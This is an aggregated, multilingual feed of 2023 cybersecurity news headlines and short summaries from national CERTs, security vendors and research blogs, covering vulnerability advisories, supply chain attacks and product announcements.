Lançado novo material da Cartilha de Segurança para Internet: Fascículo Banco via Internet https://cartilha.cert.br/fasciculos/#banco-via-internet

https://cartilha.cert.br/
RIA koordineerib Eesti osalemist suurõppusel Locked Shields 2023
2023-04-17T10:53:11Z | 1681728791

18.–21. aprillini korraldab NATO küberkaitsekoostöö keskus (CCDCOE) Tallinnas ligi 3000 osalisega küberkaitseõppuse, millest võtab osa ka RIA küberturvalisuse keskus.

https://ria.ee/uudised/ria-koordineerib-eesti-osalemist-suuroppusel-locked-shields-2023
Ensuring Secure, Scalable, and Sustainable Remote Access for the Hybrid Workforce
2023-04-17T07:22:31Z | 1681716151

Remote or hybrid work have become the de facto standard for many companies, post-pandemic, as more employees demand more flexible workplace policies. Therefore, organizations looking to support hybrid work will require a long-term strategy that ensures their infrastructure is equipped to securely facilitate this new flexible work environment.  Remote Work Creates New Security Needs The... The post Ensuring Secure, Scalable, and Sustainable Remote Access for the Hybrid Workforce appeared first on Cato Networks.

https://www.catonetworks.com/blog/ensuring-secure-scalable-and-sustainable-remote-access-for-the-hybrid-workforce/
High Threat Security Alert (A23-04-10): Vulnerability in Google Chrome
2023-04-17T04:00:00Z | 1681704000

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-04-11): Vulnerability in Microsoft Edge
2023-04-17T04:00:00Z | 1681704000

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Foundation: Our Values in Action in 2022
2023-04-14T13:00:00Z | 1681477200

https://www.akamai.com/blog/sustainability/akamai-foundation-our-values-in-action-2022
Akamai?s Perspective on April?s Patch Tuesday 2023
2023-04-14T05:00:00Z | 1681448400

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-april-2023
Risk Intelligence Index: Cyber Threat Landscape by the Numbers
2023-04-13T17:21:54Z | 1681406514

Flashpoint's monthly look at the cyber risk ecosystem affecting organizations around the world, including intelligence, news, data, and analysis about ransomware, vulnerabilities, insider threats, and high-profile cybercriminals The post Risk Intelligence Index: Cyber Threat Landscape by the Numbers appeared first on Flashpoint.

https://flashpoint.io/blog/cyber-risk-intelligence-index/
The National Cyber Security Centre Finland’s weekly review – 14/2023
2023-04-13T12:52:37Z | 1681390357

This week we talk about the spoofing of Finnish phone numbers and remind our readers not to worry too much about denial-of-service attacks, as they rarely have more than minor impacts.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-142023
The National Cyber Security Centre Finland’s weekly review – 14/2023
2023-04-13T12:52:37Z | 1681390357

This week we talk about the spoofing of Finnish phone numbers and remind our readers not to worry too much about denial-of-service attacks, as they rarely have more than minor impacts.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-142023
SS8 Announces Xcipio Interoperability with Casa Systems
2023-04-13T08:00:43Z | 1681372843

Casa Systems’ industry-leading Axyom Cloud-Native Core achieves full certification on SS8’s Lawful Intercept and Mediation Platform MILPITAS, Calif. – April 13, 2023– SS8 Networks, a leader in Lawful and Location Intelligence and Monitoring Center platforms, today announced that Casa Systems has completed interoperability testing and achieved full certification of its industry-leading, cloud-native Axyom 5G Core with SS8’s […] The post SS8 Announces Xcipio Interoperability with Casa Systems appeared first on SS8.

https://www.ss8.com/ss8-announces-xcipio-interoperability-with-casa-systems/
Lenovo Group Ltd. Smart Clock Essential SSH hard-coded password vulnerability
2023-04-13T00:00:00Z | 1681344000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1692
Sessões de Esclarecimento C-Network
2023-04-13T00:00:00Z | 1681344000

A Rede de Centros de Competências em Cibersegurança - C-Network pretende apoiar cerca de 2000 entidades, até março de 2026, atuando em estreita parceria com os agentes locais de cada região. A C-Network será composta por 7 centros de competências distribuídos pelo País, com o objetivo de apoiar as organizações locais em matéria de cibersegurança. Entre 17 e 21 de abril, estão previstas 7 sessões de esclarecimento sobre a C-Network, em formato webinar. Convidámo-lo a participar na sua sessão de interesse! Saiba mais e aceda às sessões aqui. 

https://dyn.cncs.gov.pt/pt/detalhe/art/135770/sessoes-de-esclarecimento-c-network
Investigating the resurgence of the Mexals campaign
2023-04-12T14:00:00Z | 1681308000

https://www.akamai.com/blog/security-research/mexals-cryptojacking-malware-resurgence
Trendid ja tähelepanekud küberruumis – I kvartal 2023
2023-04-12T10:40:37Z | 1681296037

RIA kvartaliülevaade võtab kokku viimase kolme kuu tähtsamad kübersündmused Eestis ja maailmas.

https://ria.ee/uudised/trendid-ja-tahelepanekud-kuberruumis-i-kvartal-2023
Get More from Your Player Analytics and CDN Logs with CMCD
2023-04-11T13:00:00Z | 1681218000

https://www.akamai.com/blog/cloud/get-your-player-analytics-with-cmcd
Akamai?s 2022 ESG Impact Report
2023-04-11T11:00:00Z | 1681210800

https://www.akamai.com/blog/sustainability/akamai-2022-esg-impact-report
Security Alert (A23-04-05): Multiple Vulnerabilities in Microsoft Edge
2023-04-11T07:53:39Z | 1681199619

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-04-04): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-04-11T07:53:32Z | 1681199612

Apple has released iOS 15.7.5, iOS 16.4.1, iPadOS 15.7.5 and iPadOS 16.4.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Chamadas de Palestras - Fórum de CSIRTs e Workshop MISP
2023-04-10T18:34:04Z | 1681151644

O 11º Fórum de CSIRTs e os eventos em conjunto ocorrerão de 31 de julho a 02 de agosto de 2023. Estão abertas as chamadas de palestras para os seguintes eventos: 11º Fórum de CSIRTs 4º Workshop MISP Mais informações em: https://forum.cert.br/

https://forum.cert.br/
The ROI of Doing Nothing
2023-04-10T11:55:57Z | 1681127757

The post The ROI of Doing Nothing appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-roi-of-doing-nothing
A sit down with Windstream Enterprise CTO on Security Service Edge
2023-04-10T10:54:35Z | 1681124075

Windstream Enterprise recently announced the arrival of North America’s first and only comprehensive managed Security Service Edge (SSE) solution, powered by Cato Networks—offering sophisticated and cloud-native security capabilities that can be rapidly implemented on almost any network for near-immediate ironclad protection. In the spirit of partnership, we sat down with Art Nichols, CTO of Windstream,... The post A sit down with Windstream Enterprise CTO on Security Service Edge appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-sit-down-with-windstream-enterprise-cto-on-security-service-edge/
Olukord küberruumis – märts 2023
2023-04-10T08:53:55Z | 1681116835

Märtsis registreerisime 226 mõjuga intsidenti, mis on viimase poole aasta keskmisest veidi madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-marts-2023
How to Be Prepared in the Age of Cyber Insecurity
2023-04-07T13:00:00Z | 1680872400

https://www.akamai.com/blog/security/preparation-in-the-age-of-cyber-insecurity
Which SSE Can Replace the Physical Datacenter Firewalls?
2023-04-06T11:00:00Z | 1680778800

Most SSE solutions can support moving branch security to the cloud. But only a few can securely cloudify the datacenter firewall. This is because datacenter firewalls don’t just address the need for secure Internet access, which is the main SSE capability. Rather, these firewalls are also used for securing WAN access, datacenter LAN segmentation and... The post Which SSE Can Replace the Physical Datacenter Firewalls? appeared first on Cato Networks.

https://www.catonetworks.com/blog/which-sse-can-replace-the-physical-datacenter-firewalls/
Security Alert (A23-04-03): Multiple Vulnerabilities in Android
2023-04-06T07:53:56Z | 1680767636

Google has released Android Security Bulletin April 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-04-02): Multiple Vulnerabilities in Google Chrome
2023-04-06T07:53:52Z | 1680767632

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-04-01): Multiple Vulnerabilities in Cisco Products
2023-04-06T07:53:48Z | 1680767628

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Hacktivists Return with DDoS Attacks, and Their Eyes on European Banks
2023-04-05T13:00:00Z | 1680699600

https://www.akamai.com/blog/security/hacktivists-return-with-ddos-attacks
RIA ja NetGroup arendavad kahte ettevõtja sündmusteenust
2023-04-05T08:10:36Z | 1680682236

Äri- ja tarkvaraettevõte Net Group hakkab RIA (Riigi Infosüsteemi Amet) tellimusel arendama ettevõtetele suunatud kaht rakendust, mis koondavad kogu info nii ettevõtete finantseerimisvõimaluste kui ka kohustuste kohta kesksesse portaali eesti.ee. Uued teenused valmivad aasta lõpuks.

https://ria.ee/uudised/ria-ja-netgroup-arendavad-kahte-ettevotja-sundmusteenust
JustSystems Corporation Ichitaro Attribute Arena buffer overflow vulnerability
2023-04-05T00:00:00Z | 1680652800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1684
JustSystems Corporation Ichitaro Frame stream parser invalid free vulnerability
2023-04-05T00:00:00Z | 1680652800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1687
JustSystems Corporation Ichitaro "LayoutBox" stream heap-based buffer overflow vulnerability
2023-04-05T00:00:00Z | 1680652800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1722
Justsystem Ichitaro Protected Attribute Identifier Use-After-Free Vulnerablity
2023-04-05T00:00:00Z | 1680652800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1673
Akamai Managed Security Service: New Expert Help to Protect from Attacks
2023-04-04T13:00:00Z | 1680613200

https://www.akamai.com/blog/security/akamai-managed-security-protect-from-attacks
Supply chain attack on 3CXDesktopApp video conferencing software
2023-04-04T11:04:17Z | 1680606257

According to observations by data security companies, harmful code has been slipped into the installation package of the widely used 3CXDesktopApp video conferencing software abroad. This code is installed onto the user’s device in connection with an update or installation. A harmful version of the software has been installed, if the download or update has taken place after 22 March 2023.

https://www.kyberturvallisuuskeskus.fi/en/ttn_30032023
Supply chain attack on 3CXDesktopApp video conferencing software
2023-04-04T11:04:17Z | 1680606257

According to observations by data security companies, harmful code has been slipped into the installation package of the widely used 3CXDesktopApp video conferencing software abroad. This code is installed onto the user’s device in connection with an update or installation. A harmful version of the software has been installed, if the download or update has taken place after 22 March 2023.

https://www.kyberturvallisuuskeskus.fi/en/ttn_30032023
Cyber and information influence activities come together in the Hack and Leak phenomenon
2023-04-04T10:50:13Z | 1680605413

The Hack and Leak phenomenon refers to instances where the objective of the attacker is to carry out a data breach of their target and then steal and utilise information critical to the victim. This can be considered a so-called hybrid attack.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/hack-and-leak
Cyber and information influence activities come together in the Hack and Leak phenomenon
2023-04-04T10:50:13Z | 1680605413

The Hack and Leak phenomenon refers to instances where the objective of the attacker is to carry out a data breach of their target and then steal and utilise information critical to the victim. This can be considered a so-called hybrid attack.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/hack-and-leak
The National Cyber Security Centre Finland’s weekly review – 13/2023
2023-04-04T10:13:56Z | 1680603236

This week, we will be talking about the Hack and Leak phenomenon and the supply chain attack aimed at the 3CXDesktopApp video conferencing software.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-132023
The National Cyber Security Centre Finland’s weekly review – 13/2023
2023-04-04T10:13:56Z | 1680603236

This week, we will be talking about the Hack and Leak phenomenon and the supply chain attack aimed at the 3CXDesktopApp video conferencing software.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-132023
The National Cyber Security Centre Finland’s weekly review – 12/2023
2023-04-03T12:49:59Z | 1680526199

This week we talk about text messages impersonating Posti that are being used to phish for bank credentials and about how companies can improve the information security of their M365 systems.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-122023
The National Cyber Security Centre Finland’s weekly review – 12/2023
2023-04-03T12:49:59Z | 1680526199

This week we talk about text messages impersonating Posti that are being used to phish for bank credentials and about how companies can improve the information security of their M365 systems.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-122023
ADMesh stl_fix_normal_directions improper array index validation vulnerability
2023-04-03T00:00:00Z | 1680480000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1594
The 3CX Supply Chain Attack – Exploiting an Ancient Vulnerability
2023-04-02T14:43:41Z | 1680446621

Supply chain attacks are one of the top concerns for any organization as they exploit (no pun intended) the inherited trust between organizations. Recent examples of similar attacks include SolarWinds and Kaseya. On March 29th, a new supply chain attack was identified targeting 3CX, a VoIP IPXS developer, with North Korean nation-state actors as the... The post The 3CX Supply Chain Attack – Exploiting an Ancient Vulnerability appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-3cx-supply-chain-attack-exploiting-an-ancient-vulnerability/
Bypassing Wi-Fi Encryption by Manipulating Transmit Queues (Framing Frames)
2023-03-31T19:44:03Z | 1680291843

Vulnerability in IEEE 802.11 implementation is found. A malicious insider can intercept traffic at the MAC layer by disconnecting a victim and connecting to the network using the victim’s MAC address and the attacker’s credentials even if clients are prevented from communicating with each other. Consequently, any packets still on route to the victim, will be received by the attacker instead.It is important to note that intercepted traffic is mostly protected by higher-layer encryption, such as TLS and HTTPS. SonicWall PSIRT believes that this vulnerability has a minimal effect on data confidentiality and considers this vulnerability a low risk vulnerability. SonicWall is not aware of any malicious use of this vulnerability. CVE: CVE-2022-47522 Last updated: April 20, 2023, 8:15 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0006
How Can We Satisfy the Cloud Needs of SaaS?
2023-03-31T13:00:00Z | 1680267600

https://www.akamai.com/blog/cloud/satisfying-the-cloud-needs-of-saas
Improving the Gamer Experience with Low-Latency Microservices
2023-03-30T13:00:00Z | 1680181200

https://www.akamai.com/blog/cloud/improving-gamer-experience-with-low-latency-microservices
How to avoid the aCropalypse
2023-03-30T12:00:22Z | 1680177622

The aCropalypse is upon us! Last week, news about CVE-2023-21036, nicknamed the “aCropalypse,” spread across Twitter and other media, and I quickly realized that the underlying flaw could be detected by our tool, PolyTracker. I’ll explain how PolyTracker can detect files affected by the vulnerability even without specific […]

https://blog.trailofbits.com/2023/03/30/acropalypse-polytracker-blind-spots/
The Evolution of Qakbot: How Cato Networks Adapts to the Latest Threats
2023-03-30T11:00:00Z | 1680174000

The world of cybersecurity is a never-ending battle, with malicious actors constantly devising new ways to exploit vulnerabilities and infiltrate networks. One such threat, causing headaches for security teams for over a decade, is the Qakbot Trojan, also known as Qbot. Qakbot has been used in malicious campaigns since 2007, and despite many attempts to... The post The Evolution of Qakbot: How Cato Networks Adapts to the Latest Threats  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-evolution-of-qakbot-how-cato-networks-adapts-to-the-latest-threats/
Security Alert (A23-03-18): Multiple Vulnerabilities in QNAP Products
2023-03-30T04:00:00Z | 1680148800

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
OpenImageIO Project OpenImageIO FitsOutput::close() denial of service vulnerability
2023-03-30T00:00:00Z | 1680134400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1709
OpenImageIO Project OpenImageIO TGAInput::read_tga2_header information disclosure vulnerability
2023-03-30T00:00:00Z | 1680134400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1707
ManageEngine OpManager Add UCS Device blind XXE vulnerability
2023-03-30T00:00:00Z | 1680134400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1685
OpenImageIO Project OpenImageIO TGAInput::decode_pixel() out-of-bounds read vulnerability
2023-03-30T00:00:00Z | 1680134400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1708
SNIProxy wildcard backend hosts buffer overflow vulnerability
2023-03-30T00:00:00Z | 1680134400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1731
The Most Common Combosquatting Keyword Is ?Support?
2023-03-29T05:00:00Z | 1680066000

https://www.akamai.com/blog/security-research/combosquatting-keyword-analysis-support
The curl quirk that exposed Burp Suite & Google Chrome
2023-03-28T13:13:51Z | 1680009231

In this post, we'll explore a little-known feature in curl that led to a local-file disclosure vulnerability in both Burp Suite Pro, and Google Chrome. We patched Burp Suite a while back, but suspect

https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome
Why a Distributed Cloud Is Perfect for Streaming
2023-03-28T13:00:00Z | 1680008400

https://www.akamai.com/blog/cloud/why-distributed-cloud-is-perfect-for-streaming
High Threat Security Alert (A23-03-17): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-03-28T04:00:00Z | 1679976000

Apple has released iOS 15.7.4, iOS 16.4, iPadOS 15.7.4 and iPadOS 16.4 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Foi publicado o Boletim 1/2023 do Observatório de Cibersegurança do CNCS
2023-03-28T00:00:00Z | 1679961600

O primeiro Boletim de 2023 do Observatório de Cibersegurança do CNCS aborda o tema da desinformação enquanto problema também de cibersegurança, nomeadamente o modo como as tecnologias digitais favorecem a disseminação e a automação da desinformação, bem como falsificações mais enganadoras.Como é habitual, este Boletim partilha ainda algumas notícias e documentos. Consulte o Boletim aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135766/foi-publicado-o-boletim-12023-do-observatorio-de-ciberseguranca-do-cncs
Security Alert (A23-03-14): Multiple Vulnerabilities in Microsoft Edge
2023-03-27T04:00:00Z | 1679889600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-15): Vulnerability in OpenSSL
2023-03-27T04:00:00Z | 1679889600

OpenSSL has released 1.1.1u, 3.0.9 and 3.1.1 to fix the vulnerability in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-16): Vulnerability in Microsoft Windows Snipping Tools
2023-03-27T04:00:00Z | 1679889600

Microsoft has released an out-of-band security update to address the vulnerability in Microsoft Windows Snipping Tools.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-1552
2023-03-27T00:00:00Z | 1679875200

ToolboxST versions prior to version 7.10 are affected by a deserialization vulnerability. An attacker with local access to an HMI, or who has conducted a social engineering attack on an authorized operator, could execute code in a Toolbox user's context through the deserialization of an untrusted configuration file. Customers are advised to update to ToolboxST 7.10 which can be found in ControlST 7.10. If unable to update at this time, customers should ensure they are following the guidance laid out in GE Gas Power's Secure Deployment Guide (GEH-6839). Customers should ensure they are not running ToolboxST as an Administrative user.

https://claroty.com/team82/disclosure-dashboard/cve-2023-1552
What?s New for Developers: March 2023
2023-03-24T13:00:00Z | 1679662800

https://www.akamai.com/blog/developers/whats-new-for-developers-march-2023
ITL andis RIA-le aasta teo auhinna
2023-03-24T07:55:06Z | 1679644506

Eile, 23. märtsil kuulutas Eesti Infotehnoloogia ja Telekommunikatsiooni Liit (ITL) välja aasta tunnustuse saajad, kes on aidanud kriitilisel ajal kaasa julgeoleku tagamisele. Aasta teo tiitli pälvis RIA küberturbe meeskond Eesti küberjulgeoleku tagamise eest.

https://ria.ee/uudised/itl-andis-ria-le-aasta-teo-auhinna
CVE-2023-1516
2023-03-24T00:00:00Z | 1679616000

CWE-732: Incorrect Permission Assignment or Critical Resource RoboDK versions 5.5.3 and prior contain an insecure permission assignment to critical directories vulnerability, which could allow a local user to escalate privileges and write files to the RoboDK process and achieve code execution. Successful exploitation of this vulnerability could allow an attacker to escalate privileges, which could allow attackers to write files to the RoboDK directory and achieve code execution. RoboDK has not responded to requests to work with CISA to mitigate this vulnerability. Users of the affected product are encouraged to contact RoboDK support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2023-1516
Exploiting prototype pollution in Node without the filesystem
2023-03-23T15:00:00Z | 1679583600

In this post, we'll introduce a new exploitation technique for Server-Side Prototype Pollution. If you've detected SSPP (maybe using one of our black-box techniques), the next step towards RCE is to f

https://portswigger.net/research/exploiting-prototype-pollution-in-node-without-the-filesystem
Novo Portal de Estatísticas do CERT.br
2023-03-23T14:00:00Z | 1679580000

Está no ar um novo portal do CERT.br: Estatísticas Mantidas pelo CERT.br https://stats.cert.br/ Neste portal estão disponíveis diversas estatísticas relacionadas com incidentes de segurança na Internet, sistemas mal configurados passíveis de serem abusados, ataques vistos em sensores (honeypots) e reclamações de spam. As estatísticas são atualizadas mensalmente. Para ser avisado sempre que uma categoria for atualizada assine o feed RSS.

https://stats.cert.br/
What Is Cloud Architecture?
2023-03-23T13:00:00Z | 1679576400

What is cloud architecture? And what types of clouds are there? Cloud architecture defines how all the components that enable cloud computing come together.

https://www.akamai.com/blog/cloud/what-is-cloud-architecture
Security Alert (A23-03-12): Multiple Vulnerabilities in Cisco Products
2023-03-23T04:00:00Z | 1679544000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-13): Vulnerability in Apache Tomcat
2023-03-23T04:00:00Z | 1679544000

The Apache Software Foundation released a security update to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
What the NIS2 Directive Means for Your Business and Your APIs
2023-03-23T00:25:00Z | 1679531100

Learn how implementing a comprehensive cybersecurity program that addresses all aspects of API security can ensure compliance with the NIS2 Directive.

https://www.akamai.com/blog/security/2024/sep/what-the-nis2-directive-means-for-your-business-and-your-apis
Chatbots, Celebrities, and Victim Retargeting: Why Crypto Giveaway Scams Are Still So Successful
2023-03-22T14:00:00Z | 1679493600

https://www.akamai.com/blog/security-research/crypto-giveaway-scams-are-still-successful
Codex (and GPT-4) can’t beat humans on smart contract audits
2023-03-22T11:00:49Z | 1679482849

Is artificial intelligence (AI) capable of powering software security audits? Over the last four months, we piloted a project called Toucan to find out. Toucan was intended to integrate OpenAI’s Codex into our Solidity auditing workflow. This experiment went far […]

https://blog.trailofbits.com/2023/03/22/codex-and-gpt4-cant-beat-humans-on-smart-contract-audits/
Cato Protects Against CVE-2023-23397 Exploits
2023-03-22T11:00:48Z | 1679482848

A new critical vulnerability impacting Microsoft Outlook (CVE-2023-23397) was recently published by Microsoft. The CVE is particularly concerning as no user involvement is required by the exploit. Once a user receives a malicious calendar invite, the attacker can gain a user’s Active Directory credentials.   Microsoft has released a security update that can be found here.... The post Cato Protects Against CVE-2023-23397 Exploits  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-protects-against-cve-2023-23397-exploits/
Security Alert (A23-03-11): Multiple Vulnerabilities in Google Chrome
2023-03-22T04:00:00Z | 1679457600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Defeating Triple Extortion Ransomware: The Potent Combo of Ransomware and DDoS Attacks
2023-03-21T13:00:00Z | 1679403600

Protect your organization from triple extortion ransomware ? the devastating combination of ransomware and a DDoS attack ? with these four steps.

https://www.akamai.com/blog/security/defeating-triple-extortion-ransomware
The National Cyber Security Centre Finland’s weekly review – 11/2023
2023-03-21T12:10:19Z | 1679400619

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 10–16 March 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-112023
The National Cyber Security Centre Finland’s weekly review – 11/2023
2023-03-21T12:10:19Z | 1679400619

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 10–16 March 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-112023
Are You Trapped in the Upside-Down World of Networking and Security?
2023-03-21T12:03:29Z | 1679400209

Many enterprises today are exploring the benefits of Secure Access Service Edge (SASE). SASE is a modern networking and security solution for enterprises that converges SD-WAN and network security solutions like NGFW, IPS, and NGAM. SASE provides a single, unified and cloud-native network and security service that is adapted to current and future technology and... The post Are You Trapped in the Upside-Down World of Networking and Security? appeared first on Cato Networks.

https://www.catonetworks.com/blog/are-you-trapped-in-the-upside-down-world-of-networking-and-security/
Circomspect has more passes!
2023-03-21T12:00:24Z | 1679400024

TL;DR: We have released version 0.8.0 of Circomspect, our static analyzer and linter for Circom. Since our initial release of Circomspect in September 2022, we have added five new analysis passes, support for tags, tuples, and anonymous components, links to in-depth descriptions of each identified issue, and squashed a […]

https://blog.trailofbits.com/2023/03/21/circomspect-static-analyzer-circom-more-passes/
Netgear Orbi Router RBR750 Remote Management cleartext transmission vulnerability
2023-03-21T00:00:00Z | 1679356800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1598
Netgear Orbi Router RBR750 hidden telnet service command execution vulnerability
2023-03-21T00:00:00Z | 1679356800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1595
Netgear Orbi Router RBR750 access control command execution vulnerability
2023-03-21T00:00:00Z | 1679356800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1596
Netgear Orbi Satellite RBS750 ubus backend communications command execution vulnerability
2023-03-21T00:00:00Z | 1679356800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1597
NCSC launches flagship new services to help millions of small organisations stay safe online
2023-03-20T16:23:39Z | 1679329419

New online tools for small organisations to help find and fix any cyber security issues.

https://www.ncsc.gov.uk/news/ncsc-launches-new-services-help-small-organisations-online
What Proposed New Changes in the OWASP API Security Top 10 Mean for You
2023-03-20T13:00:00Z | 1679317200

The new OWASP Top 10 for API Security release candidate is a fantastic step in an API-specific direction, emphasizing the distinct nature of API threats.

https://www.akamai.com/blog/security/proposed-new-changes-in-owasp-api-security
The Value of Network Redundancy
2023-03-20T11:34:03Z | 1679312043

Corporate IT infrastructure has become crucial to the success of the modern business. Disruption in  the availability of corporate applications and services will impact employee productivity and business profitability. Companies are responsible for the resiliency of their own IT systems and this includes ensuring the constant availability of critical business applications for employees, customers, and... The post The Value of Network Redundancy appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-value-of-network-redundancy/
WellinTech KingHistorian SORBAx64.dll RecvPacket integer conversion vulnerability
2023-03-20T00:00:00Z | 1679270400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1674
WellinTech KingHistorian User authentication information disclosure vulnerability
2023-03-20T00:00:00Z | 1679270400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1683
Preparing for the Multicloud Future
2023-03-17T13:00:00Z | 1679058000

Take advantage of multicloud flexibility to reduce risk, match spend to your current needs, and increase the pace of innovation.

https://www.akamai.com/blog/cloud/preparing-for-multicloud-future
February Cyber Weather included storm clouds caused by espionage
2023-03-17T12:35:36Z | 1679056536

The Cyber Weather in February included sunshine and rain – and even some storms caused by espionage. The sun came out particularly in the world of automation and IoT, which is also the focus of our new instructions on the cyber security controls of industrial automation published in February.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_02/2023
February Cyber Weather included storm clouds caused by espionage
2023-03-17T12:35:36Z | 1679056536

The Cyber Weather in February included sunshine and rain – and even some storms caused by espionage. The sun came out particularly in the world of automation and IoT, which is also the focus of our new instructions on the cyber security controls of industrial automation published in February.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_02/2023
Organisations helping most vulnerable in society offered free cyber security support
2023-03-17T09:21:34Z | 1679044894

Funded Cyber Essentials Programme offers some small organisations in high-risk sectors free practical support to help put cyber security controls in place.

https://www.ncsc.gov.uk/news/organisations-helping-most-vulnerable-offered-cyber-essentials-support
Arvutikuritegusid registreeriti aastaga neljandiku võrra vähem
2023-03-17T08:00:25Z | 1679040025

Justiitsministeeriumi kuritegevuse ülevaatest selgub, et 2022. aastal registreeriti kokku 1200 arvutikuritegu, mida on 25% vähem kui 2021. aastal. Selline langus on viimase kümne aasta jooksul esmakordne.

https://ria.ee/uudised/arvutikuritegusid-registreeriti-aastaga-neljandiku-vorra-vahem
Akamai?s Perspective on March?s Patch Tuesday 2023
2023-03-17T05:00:00Z | 1679029200

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-march-2023
SASE For Different Verticals
2023-03-16T09:06:47Z | 1678957607

The post SASE For Different Verticals appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-for-different-verticals/
Uncovering HinataBot: A Deep Dive into a Go-Based Threat
2023-03-16T05:00:00Z | 1678942800

https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet
Security Alert (A23-03-10): Multiple Vulnerabilities in Drupal
2023-03-16T04:00:00Z | 1678939200

Drupal has released security advisories to address multiple vulnerabilities in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Ghost Foundation node-sqlite3 code execution vulnerability
2023-03-16T00:00:00Z | 1678924800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1645
Introducing MDBR+: Customized Security for Government Organizations
2023-03-15T13:00:00Z | 1678885200

https://www.akamai.com/blog/security/introducing-mdbr-customized-security-for-government-organizations
High Threat Security Alert (A23-03-08): Multiple Vulnerabilities in Microsoft Products (March 2023)
2023-03-15T04:00:00Z | 1678852800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-03-09): Multiple Vulnerabilities in Firefox
2023-03-15T04:00:00Z | 1678852800

Mozilla has published the advisories (MFSA2023-09 and MFSA2023-10) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
The National Cyber Security Centre Finland’s weekly review – 10/2023
2023-03-14T14:38:48Z | 1678804728

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 3–9 March 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

